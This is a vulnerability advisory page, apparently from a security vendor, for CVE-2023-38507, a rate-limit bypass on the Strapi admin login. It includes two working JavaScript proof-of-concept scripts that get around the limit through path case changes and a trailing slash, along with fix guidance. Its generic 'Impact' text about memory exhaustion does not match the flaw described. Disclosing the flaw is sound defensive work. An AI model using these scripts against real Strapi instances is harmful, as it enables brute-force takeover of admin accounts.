CVE-2023-38507

CVE-2023-38507 is a high-severity allocation of resources without limits or throttling vulnerability in @strapi/admin (npm), affecting versions < 4.12.1. It is fixed in 4.12.1.

Summary

1. Summary

There is a rate limit on the login function of Strapi's admin screen, but it is possible to circumvent it.

2. Details

It is possible to avoid this by modifying the rate-limited request path as follows.

  1. Manipulating request paths to upper or lower case. (Pattern 1)
    • In this case, avoidance is possible with various patterns.
  2. Add path slashes to the end of the request path. (Pattern 2)

3. PoC

Access the administrator's login screen (/admin/auth/login) and execute the following PoC on the browser's console screen.

Pattern 1 (uppercase and lowercase)

// poc.js
(async () => {
  const data1 = {
    email: "[email protected]",   // registered e-mail address
    password: "invalid_password",
  };
  const data2 = {
    email: "[email protected]",
    password: "RyG5z-CE2-]*4e4",   // correct password
  };

  for (let i = 0; i < 30; i++) {
    await fetch("http://localhost:1337/admin/login", {
      method: "POST",
      body: JSON.stringify(data1),
      headers: {
        "Content-Type": "application/json",
      },
    });
  }

  const res1 = await fetch("http://localhost:1337/admin/login", {
    method: "POST",
    body: JSON.stringify(data2),
    headers: {
      "Content-Type": "application/json",
    },
  });
  console.log(res1.status + " " + res1.statusText);

  const res2 = await fetch("http://localhost:1337/admin/Login", {  // capitalize part of path
    method: "POST",
    body: JSON.stringify(data2),
    headers: {
      "Content-Type": "application/json",
    },
  });
  console.log(res2.status + " " + res2.statusText);
})();

This PoC does the following:

  1. Request 30 incorrect logins.
  2. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (429 Too Many Requests)
  3. Next, falsify the pathname of the request (/admin/Login) and make a request again to confirm that it is possible to bypass the rate limit and log in. (200 OK)

Pattern 2 (trailing slash)

// poc.js
(async () => {
  const data1 = {
    email: "[email protected]",   // registered e-mail address
    password: "invalid_password",
  };
  const data2 = {
    email: "[email protected]",
    password: "RyG5z-CE2-]*4e4",   // correct password
  };

  for (let i = 0; i < 30; i++) {
    await fetch("http://localhost:1337/admin/login", {
      method: "POST",
      body: JSON.stringify(data1),
      headers: {
        "Content-Type": "application/json",
      },
    });
  }

  const res1 = await fetch("http://localhost:1337/admin/login", {
    method: "POST",
    body: JSON.stringify(data2),
    headers: {
      "Content-Type": "application/json",
    },
  });
  console.log(res1.status + " " + res1.statusText);

  const res2 = await fetch("http://localhost:1337/admin/login/", {  // trailing slash
    method: "POST",
    body: JSON.stringify(data2),
    headers: {
      "Content-Type": "application/json",
    },
  });
  console.log(res2.status + " " + res2.statusText);
})();

This PoC does the following:

  1. Request 30 incorrect logins.
  2. Execute the same request again and confirm that it is blocked by rate limit from the console screen. (429 Too Many Requests)
  3. Next, falsify the pathname of the request (/admin/login/) and make a request again to confirm that it is possible to bypass the rate limit and log in. (200 OK)

PoC Video

4. Impact

It is possible to bypass the rate limit of the login function of the admin screen.
Therefore, the possibility of unauthorized login by login brute force attack increases.

5. Measures

Forcibly convert the request path used for rate limiting to upper case or lower case and judge it as the same path. (ctx.request.path)
Also, remove any extra slashes in the request path.

https://github.com/strapi/strapi/blob/32d68f1f5677ed9a9a505b718c182c0a3f885426/packages/core/admin/server/middlewares/rateLimit.js#L31

6. References

Impact

The application allocates resources such as memory, threads, or file descriptors based on untrusted input without enforcing a cap. Typical impact: resource exhaustion leading to denial of service.

CVE-2023-38507 has a CVSS score of 7.3 (High). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.12.1); upgrading removes the vulnerable code path.

Affected versions

@strapi/admin (< 4.12.1) @strapi/plugin-users-permissions (< 4.12.1)

Security releases

@strapi/admin → 4.12.1 (npm) @strapi/plugin-users-permissions → 4.12.1 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade the following packages to resolve this vulnerability:

@strapi/admin to 4.12.1 or later; @strapi/plugin-users-permissions to 4.12.1 or later

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2023-38507? CVE-2023-38507 is a high-severity allocation of resources without limits or throttling vulnerability in @strapi/admin (npm), affecting versions < 4.12.1. It is fixed in 4.12.1. The application allocates resources such as memory, threads, or file descriptors based on untrusted input without enforcing a cap.
  2. How severe is CVE-2023-38507? CVE-2023-38507 has a CVSS score of 7.3 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which packages are affected by CVE-2023-38507?
    • @strapi/admin (npm) (versions < 4.12.1)
    • @strapi/plugin-users-permissions (npm) (versions < 4.12.1)
  4. Is there a fix for CVE-2023-38507? Yes. CVE-2023-38507 is fixed in 4.12.1. Upgrade to this version or later.
  5. Is CVE-2023-38507 exploitable, and should I be worried? Whether CVE-2023-38507 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2023-38507 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2023-38507?
    • Upgrade @strapi/admin to 4.12.1 or later
    • Upgrade @strapi/plugin-users-permissions to 4.12.1 or later

Other vulnerabilities in @strapi/admin

CVE-2026-22706CVE-2023-38507CVE-2023-36472

Stop the waste.
Protect your environment with Kodem.